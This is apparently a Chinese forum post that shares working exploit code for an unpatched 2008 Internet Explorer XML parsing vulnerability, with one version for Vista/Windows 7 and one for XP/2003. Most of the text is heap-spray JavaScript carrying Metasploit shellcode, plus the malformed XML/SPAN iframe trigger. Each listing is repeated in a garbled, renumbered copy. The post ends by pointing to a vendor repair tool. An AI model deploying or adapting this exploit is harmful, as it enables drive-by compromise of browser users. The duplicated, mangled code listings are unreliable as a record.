微軟IE最新XML漏洞利用代碼,目前微軟尚未發佈修復該漏洞的補丁,大家可利用如下代碼進行測試,但請勿用於***
適用於VISTA操作系統的代碼(VISTA/SERVER 2008/WINDOWS 7):
1![]()
1. <html>
2![]()
2. <script>
3![]()
3.
4![]()
4. // k`sOSe 12/10/2008
5![]()
5. // Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
6![]()
6. // Heap spray address adjusted for Vista - muts / offensive-security.com
7![]()
7. // [url]http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html[/url]
8![]()
8. // [url]http://www.offensive-security.com/0day/iesploit-vista.rar[/url]
9![]()
9. // windows/exec - 141 bytes
10![]()
10. // [url]http://www.metasploit.com [/url]
11![]()
11. // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
12![]()
12. var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
13![]()
13. var block = unescape("%u0c0c%u0c0c");
14![]()
14. var nops = unescape("%u9090%u9090%u9090");
15![]()
15.
16![]()
16.
17![]()
17. while (block.length < 81920) block += block;
18![]()
18. var memory = new Array();
19![]()
19. var i=0;
20![]()
20. for (;i<1000;i++) memory[i] += (block + nops + shellcode);
21![]()
21.
22![]()
22. document.write("<iframe src=\"iframe.html\">");
23![]()
23.
24![]()
24. </script>
25![]()
25.
26![]()
26.
27![]()
27. </html>
28![]()
28.
29![]()
29.
30![]()
30. <!-- iframe.html
31![]()
31.
32![]()
32. <XML ID=I>
33![]()
33. <X>
34![]()
34. <C>
35![]()
35. <![CDATA[
36![]()
36. <image
37![]()
37. SRC=http://ఌఌ.xxxxx.org
38![]()
38. >
39![]()
39. ]]>
40![]()
40.
41![]()
41. </C>
42![]()
42. </X>
43![]()
43. </XML>
44![]()
44.
45![]()
45. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
46![]()
46. <XML ID=I>
47![]()
47. </XML>
48![]()
48.
49![]()
49. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
50![]()
50. </SPAN>
51![]()
51. </SPAN>
52![]()
52.
53![]()
53. -->
54![]()
1. <html>2
2. <script>
2. 
3
3. 4
4. // k`sOSe 12/10/20085
5. // Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.163866
6. // Heap spray address adjusted for Vista - muts / offensive-security.com7
7. // [url]http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html[/url]8
8. // [url]http://www.offensive-security.com/0day/iesploit-vista.rar[/url]9
9. // windows/exec - 141 bytes10
10. // [url]http://www.metasploit.com [/url]11
11. // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe 12
12. var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");13
13. var block = unescape("%u0c0c%u0c0c");14
14. var nops = unescape("%u9090%u9090%u9090");15
15. 16
16. 17
17. while (block.length < 81920) block += block;18
18. var memory = new Array();19
19. var i=0;20
20. for (;i<1000;i++) memory[i] += (block + nops + shellcode);21
21. 22
22. document.write("<iframe src=\"iframe.html\">");23
23. 24
24. </script>25
25. 26
26. 27
27. </html>28
28. 29
29. 30
30. <!-- iframe.html31
31. 32
32. <XML ID=I>33
33. <X>34
34. <C>35
35. <![CDATA[36
36. <image 37
37. SRC=http://ఌఌ.xxxxx.org 38
38. >39
39. ]]>40
40. 41
41. </C>42
42. </X>43
43. </XML>44
44. 45
45. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>46
46. <XML ID=I>47
47. </XML>48
48. 49
49. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>50
50. </SPAN>51
51. </SPAN>52
52. 53
53. -->54
適用於WINDOWS舊版本操作系統的代碼(XP/2003/2000等):
1![]()
1. ie-sploit.html
2![]()
2. <html>
3![]()
3. <script>
4![]()
4.
5![]()
5. // k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13
6![]()
6.
7![]()
7. // windows/exec - 141 bytes
8![]()
8. // [url]http://www.metasploit.com [/url]
9![]()
9. // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe
10![]()
10. var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
11![]()
11. var block = unescape("%u0a0a%u0a0a");
12![]()
12. var nops = unescape("%u9090%u9090%u9090");
13![]()
13.
14![]()
14.
15![]()
15. while (block.length < 81920) block += block;
16![]()
16. var memory = new Array();
17![]()
17. var i=0;
18![]()
18. for (;i<1000;i++) memory[i] += (block + nops + shellcode);
19![]()
19.
20![]()
20. document.write("<iframe src=\"iframe.html\">");
21![]()
21.
22![]()
22. </script>
23![]()
23.
24![]()
24.
25![]()
25. </html>
26![]()
26.
27![]()
27. iframe.html
28![]()
28. <XML ID=I>
29![]()
29. <X>
30![]()
30. <C>
31![]()
31. <![CDATA[
32![]()
32. <image
33![]()
33. SRC=http://ਊਊ.xxxxx.org
34![]()
34. >
35![]()
35. ]]>
36![]()
36.
37![]()
37. </C>
38![]()
38. </X>
39![]()
39. </XML>
40![]()
40.
41![]()
41. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
42![]()
42. <XML ID=I>
43![]()
43. </XML>
44![]()
44. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
45![]()
45. </SPAN>
46![]()
46. </SPAN>
47![]()
1. ie-sploit.html2
2. <html>3
3. <script>4
4. 5
5. // k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.136
6. 7
7. // windows/exec - 141 bytes 8
8. // [url]http://www.metasploit.com [/url]9
9. // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe 10
10. var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");11
11. var block = unescape("%u0a0a%u0a0a");12
12. var nops = unescape("%u9090%u9090%u9090");13
13. 14
14. 15
15. while (block.length < 81920) block += block;16
16. var memory = new Array();17
17. var i=0;18
18. for (;i<1000;i++) memory[i] += (block + nops + shellcode);19
19. 20
20. document.write("<iframe src=\"iframe.html\">");21
21. 22
22. </script>23
23. 24
24. 25
25. </html>26
26. 27
27. iframe.html28
28. <XML ID=I>29
29. <X>30
30. <C>31
31. <![CDATA[32
32. <image 33
33. SRC=http://ਊਊ.xxxxx.org 34
34. >35
35. ]]>36
36. 37
37. </C>38
38. </X>39
39. </XML>40
40. 41
41. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>42
42. <XML ID=I>43
43. </XML>44
44. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>45
45. </SPAN>46
46. </SPAN>47
目前微軟尚未對該漏洞發佈相應的補丁,我們如何對該漏洞進行防範呢,360安全衛士推出了一款修復工具可以對該漏洞進行修復,修復工具下載地址爲[url]http://dl.360safe.com/360fixmsxml.exe[/url]。